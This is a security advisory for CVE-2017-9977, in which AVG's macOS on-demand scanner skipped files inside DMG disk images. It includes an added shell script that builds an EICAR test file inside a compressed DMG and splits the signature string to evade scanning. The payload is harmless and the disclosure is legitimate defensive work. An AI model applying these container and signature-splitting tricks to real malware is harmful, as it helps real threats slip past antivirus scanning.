AVG AntiVirus for MacOS Doesn’t Scan Inside Disk Images [CVE-2017-9977]

Summary

AVG AntiVirus for MacOS does not scan files inside disk image (DMG) files in the on-demand scanner. Real-time (on-access) scanning and compressed archives such as ZIP files were scanned properly.

The vendor did not consider this to be a security issue but an enhancement, and released a fix in engine version 4668. MITRE has assigned CVE-2017-9977 for this issue.

Details

AVG provides various anti-virus products for multiple platforms including MacOS. During our testing, we found that the on-demand scanner in AVG AntiVirus for MacOS did not scan files inside disk image (DMG) files, so a scan of an image containing malware reports it as clean.

To replicate, do the following:

  1. Download the EICAR test file.
  2. Open the Disk Utility in MacOS, and create a new image.
  3. Drag the EICAR file to the mounted disk image, then right click on the mounted image and eject (un-mount) it.
  4. Install AVG AntiVirus, open AVG and drag the disk image onto the on-demand scanner's drop area. Observe that no virus is detected, whereas dragging the same EICAR file inside a ZIP archive is detected.
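The following script is an added reproduction helper and is not part of the original advisory or of AVG's own tooling. It performs steps 1 to 3 with macOS command-line tools instead of Disk Utility, and also builds a ZIP control sample with the same payload (the advisory reports that ZIP archives are scanned correctly). Step 4 remains a manual drag into the AVG window, since the advisory gives no command-line interface for AVG and none is assumed here. It assumes a macOS host with hdiutil and zip on PATH; the `build` argument, file names and volume name are the script's own choices.

```shell
#!/bin/sh
# Added reproduction helper for CVE-2017-9977 (not from the original advisory).
# Assumes macOS with hdiutil and zip in PATH. AVG itself is driven from its GUI.
set -eu

# The 68-byte EICAR test string, split in two so a pattern scanner does not
# trip on this script file itself. The constant is the standard one.
EICAR_HEAD='X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-'
EICAR_TAIL='ANTIVIRUS-TEST-FILE!$H+H*'

# Step 1: write the EICAR test file to the path in $1.
make_eicar() {
    printf '%s%s' "$EICAR_HEAD" "$EICAR_TAIL" > "$1"
}

# Byte length of a file, with the padding some wc implementations add removed.
file_size() {
    wc -c < "$1" | tr -d ' '
}

# Steps 2 and 3: stage the file in a folder and build a read-only, zlib-compressed
# (UDZO) image from it. hdiutil leaves the image unmounted, so no eject is needed.
# A compressed image also guarantees the test string is not present as plain bytes,
# so a detection (or a miss) says something about container traversal rather than
# about a raw byte scan of the image file.
make_dmg() {  # $1 = EICAR file, $2 = output .dmg
    staging=$(mktemp -d)
    cp "$1" "$staging/eicar.com"
    hdiutil create -quiet -srcfolder "$staging" -volname EICARTEST -format UDZO "$2"
    rm -rf "$staging"
}

# Control case: the same payload inside a ZIP archive.
make_zip() {  # $1 = EICAR file, $2 = output .zip
    zip -q -j "$2" "$1"
}

# Returns success when the test string is stored uncompressed in the file.
contains_plain_eicar() {
    grep -q -a 'EICAR-STANDARD-ANTIVIRUS-TEST-FILE' "$1"
}

# Usage: sh repro.sh build [output-dir]
if [ "${1:-}" = "build" ]; then
    out=${2:-$PWD}
    make_eicar "$out/eicar.com"
    make_dmg "$out/eicar.com" "$out/eicar.dmg"
    make_zip "$out/eicar.com" "$out/eicar.zip"
    if contains_plain_eicar "$out/eicar.dmg"; then
        echo "warning: image stores the test string uncompressed; result is ambiguous" >&2
    fi
    echo "Step 4: drag $out/eicar.dmg, then $out/eicar.zip, onto AVG's on-demand scan area."
fi
```

After running `sh repro.sh build`, the expected result on an unfixed engine is that the ZIP is flagged and the DMG is not; on engine 4668 or later both should be flagged. Mounting the DMG afterwards and opening `eicar.com` exercises the on-access path the vendor refers to below.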

We did not test other disk image types such as ISO, but presume they are likely affected as well.

Vendor Response

The vendor response is as follows:

OK, we consider this as a new feature request — to traverse DMG files in on-demand scan. But there is no security impact, because once the DMG is mounted, the on-access scanner protects you from opening malware files.

Nevertheless, the issue was fixed in engine version 4668 in October 2016, and the fix was confirmed again in version 17.2, virus database 170626-4.

References

CVE ID: CVE-2017-9977

Credits

Advisory written by Yakov Shafranovich.

Timeline

2016-05-08: Initial report to the vendor via BugCrowd
2016-05-10: Follow up report to the vendor
2016-05-12: Communication with the vendor
2016-05-13: Issue confirmed by the vendor
2016-10-05: Fix released and confirmed
2017-04-18: Request for public disclosure via BugCrowd
2017-04-19: Vendor is ok with public disclosure, asks for advance copy of the advisory
2017-06-28: Fix re-confirmed and proposed advisory shared with the vendor
2017-07-06: Public disclosure
